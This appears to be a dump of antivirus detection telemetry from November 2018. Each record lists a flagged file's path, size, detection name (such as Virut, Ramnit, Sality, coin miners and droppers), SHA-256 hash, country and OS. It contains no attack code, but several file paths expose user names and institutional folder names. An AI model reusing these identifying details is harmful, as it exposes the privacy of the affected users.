  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:36:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:14:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215433-16ef84d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c9b8cea\\AVSCAN-20181101-211938-33E69CE4\\AVSCAN-20181101-215433-16EF84D0', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:54:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002538-4cf1cdd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002538-4CF1CDD5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_isdel.exe', filepath='D:\\M I S C\\SOFTWAREs\\GRAFIS\\photoshop plugin\\KnockOut on prams (Photogra-03848f)\\_ISDel.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='5164960ecb486447babfc8e84df67357236554809e84b5f6f11ca9beff600642', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:33:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='69b0f5c04b12d3bbabb62464a98b6821d44f5213d738b885f10ff40f4c56808a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:58:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185110-fd4e3acf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8690ed0\\AVSCAN-20181101-185048-F9C61B6D\\AVSCAN-20181101-185110-FD4E3ACF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:51:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160238-9ce54dcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20bba27a\\AVSCAN-20181101-160132-3B6207F7\\AVSCAN-20181101-160238-9CE54DCF', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:02:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:36:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053450-27b5b7d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053450-27B5B7D6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.119\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.119\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:36:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-070550-fdd9e3c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_328b17cb\\AVSCAN-20181101-070535-FBD22DD9\\AVSCAN-20181101-070550-FDD9E3C1', filesize=512000, name='TR/Crypt.ZPACK.Gen2.100871.#M1.#R1'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:05:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='i2owb436.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\i2owb436.exe', filesize=128000, name='HEUR/AGEN.1031358.#M1.#R1'), hash='05ef2a5ba87cf6744258137434f14566712d632c88c70e00fa161eb1bd5a7de8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002548-4e16c8a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002548-4E16C8A6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bloodover.exe', filepath='\\?\\J:\\العاب2\\Blood Over\\BloodOver.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='4026739aad96c23f32a950d7eebe8ae33ff1332d236e65f02dea18aa63906956', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6916867c9641b8eeb589bd50edd0242d6a6f20e5a67ed985a94856f7f3440dc3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\6916867C9641B8EEB589BD50EDD0242D6A6F20E5A67ED985A94856F7F3440DC3', filesize=784000, name='TR/Crypt.XPACK.Gen.#M300.#R3455'), hash='6916867c9641b8eeb589bd50edd0242d6a6f20e5a67ed985a94856f7f3440dc3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:11:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235152-fa972a6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181101-235152-FA972A6F', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:51:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\program files (x86)\\microsoft\\watermark.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003228-7966a54f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003228-7966A54F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005510-21f77a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181102-005510-21F77A2C', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:58:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='1e6b47af63ca010186635f64f9a1278fb1460b97c88500f9980345fc2c5601fc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LR+zorPAlEGtGn9J.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:44:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:38:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsjCD94.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T07:58:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a97ba4fa26c9deca56656b13df4945adf9c52ef42438375ff2cedbe27912d110.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-13.available\\Avira\\A97BA4FA26C9DECA56656B13DF4945ADF9C52EF42438375FF2CEDBE27912D110.VIR', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='a97ba4fa26c9deca56656b13df4945adf9c52ef42438375ff2cedbe27912d110', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:45:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095142-52173386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095142-52173386', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsz1F64.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T13:29:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='be23b9a8e570b749f8036a57b35c87192a66b6dda3717f763c29a491b5a26768', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\BE23B9A8E570B749F8036A57B35C87192A66B6DDA3717F763C29A491B5A26768', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='be23b9a8e570b749f8036a57b35c87192a66b6dda3717f763c29a491b5a26768', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:11:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='garanzia giovani.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\GARANZIA GIOVANI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='servizi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\servizi.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tutto engim.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\TUTTO ENGIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ace2cb691c408b678d2822c52779dcc258a16751518803e086ce31f1f13e2b13', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T18:42:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='K:\\TAB\\Lenovo_S660\\Lenovo_S660_ROW_S029_140228_(by_xdafirmware.com)\\Lenovo_S660_ROW_S029_140228\\SN Write Tool v2.1444.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='df8aa8d28272927ae746bff858ad90e889e527c1f0a1d8e75aa60b723d3be8f2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101640-58c1401d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_223726da\\AVSCAN-20181101-101623-558AF057\\AVSCAN-20181101-101640-58C1401D', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='val cavallina.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\VAL CAVALLINA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corsi 686.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\corsi 686.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qtzzkwst.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\QtZZkwsT.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='servizi alla persona.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI ALLA PERSONA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b5e0499d414fbaede45bc88483aabd98ed37fdc05508cfd8b727ce0322afa1f6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B5E0499D414FBAEDE45BC88483AABD98ED37FDC05508CFD8B727CE0322AFA1F6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b5e0499d414fbaede45bc88483aabd98ed37fdc05508cfd8b727ce0322afa1f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:29:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095528-7d3ea04f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095528-7D3EA04F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b88145ea3199caff8a67e4ab0da01c8bd5822fc86a39cab40c1d33e308fe10cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B88145EA3199CAFF8A67E4AB0DA01C8BD5822FC86A39CAB40C1D33E308FE10CD', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='b88145ea3199caff8a67e4ab0da01c8bd5822fc86a39cab40c1d33e308fe10cd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:22:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212218-e0cbe9eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212218-E0CBE9EB', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='86a7b4901bb5fbbcd40d7730584acd0c814247b1160262715180ddac60d83142', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\86A7B4901BB5FBBCD40D7730584ACD0C814247B1160262715180DDAC60D83142', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='86a7b4901bb5fbbcd40d7730584acd0c814247b1160262715180ddac60d83142', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:08:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T22:20:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T11:51:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tuppsetup_2005.exe', filepath='C:\\Users\\X\\Downloads\\tuppsetup_2005.exe', filesize=3460000, name='PUA/Systweak.Gen4.#M300.#R300346'), hash='7dc1bbc0972a3b0781c717b718319628892d477edc9a95fbacf7e9e14684f782', metadata=Row(cmdline='https:\\\\\\/\\\\\\/www.duba.com\\\\\\/?f=chedh&ft=gjlock&--type=0&hid=18_1_18_4_&pru=1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1588568, timestamp='2018-11-04T05:32:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132245-4b6594df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132245-4B6594DF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:43Z'), dt=datetime.date(2018, 11, 4)),
